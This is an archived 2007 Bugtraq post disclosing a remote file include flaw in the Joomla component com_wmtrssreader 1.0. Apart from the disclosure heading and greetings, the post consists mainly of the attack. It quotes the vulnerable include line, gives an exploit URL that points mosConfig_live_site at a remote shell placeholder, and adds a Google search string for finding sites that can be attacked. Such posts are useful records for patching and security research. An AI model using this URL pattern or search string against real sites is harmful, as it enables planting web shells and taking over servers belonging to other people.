[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

wmtrssreader joomla component 1.0 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
From: cyber-crime@xxxxxxxxxxxxxxxxxxx
Date: 10 Oct 2007 06:47:12 -0000

#########################################################################################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

 Component       : com_wmtrssreader version 1.0
 Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you 
must register)
 Dicovered by    : Cyber-Crime
 Contact         : cyber-crime@xxxxxxxxxxx
 Orginal         : http://www.sibersavascilar.com/category/security

==================================================================================================================================

# Vulnerable found in 
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php


include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );


# Exploit

 
http://localhost/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?


# google dork

 inurl:com_wmtrssreader

==================================================================================================================================

# Greetz :  www.sibersavascilar.com  www.sibersavascilar.net 
www.sibersavascilar.org


==================================================================================================================================

#########################################################################################################

Prev by Date: Remote Desktop Command Fixation Attacks
Next by Date: Several vulnerabilities in CMS Made Simple 1.1.3.1
Previous by thread: Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
Next by thread: Several vulnerabilities in CMS Made Simple 1.1.3.1
Index(es):
- Date
- Thread